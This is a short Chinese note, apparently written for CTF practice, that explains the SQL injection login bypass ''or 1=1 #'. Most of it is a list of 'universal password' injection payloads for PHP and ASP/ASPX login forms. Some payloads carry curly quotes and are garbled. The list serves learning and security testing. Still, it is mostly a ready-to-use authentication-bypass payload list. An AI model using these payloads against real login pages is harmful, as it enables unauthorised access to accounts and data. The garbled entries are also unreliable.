账号 'or 1=1 #
密码任意
(这个很好用!)
一般的验证语句为
select * from table_name where username=‘admin’ or 1=1#’ and passwords =‘‘ssss’’
账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag
php | PHP万能密码 |
'or 1=1/* | |
"or “a”="a | |
"or 1=1– | |
“or”=" | |
“or”="a’='a | |
"or1=1– | |
“or=or” | |
'‘or’=‘or’ | |
') or (‘a’='a | |
‘.).or.(’.a.’=’.a | |
'or 1=1 | |
'or 1=1– | |
'or 1=1/* | |
‘or"="a’='a | |
‘or’ ‘1’=‘1’ | |
‘or’’=’ | |
‘or’’=’‘or’’=’ | |
‘or’=‘1’ | |
‘or’=‘or’ | |
'or.‘a.’='a | |
'or1=1– | |
1’or’1’='1 | |
a’or’ 1=1– | |
a’or’1=1– | |
or ‘a’=‘a’ | |
or 1=1– | |
or1=1– |
asp | aspx万能密码 |
"or “a”="a | |
‘.).or.(’.a.’=’.a | |
or 1=1– | |
'or 1=1– | |
a’or’ 1=1– | |
"or 1=1– | |
'or.‘a.’='a | |
“or”="a’='a | |
‘or’’=’ | |
‘or’=‘or’ | |
admin’or 1=1# |
本文只为记录学习 如有侵权请联系作者删除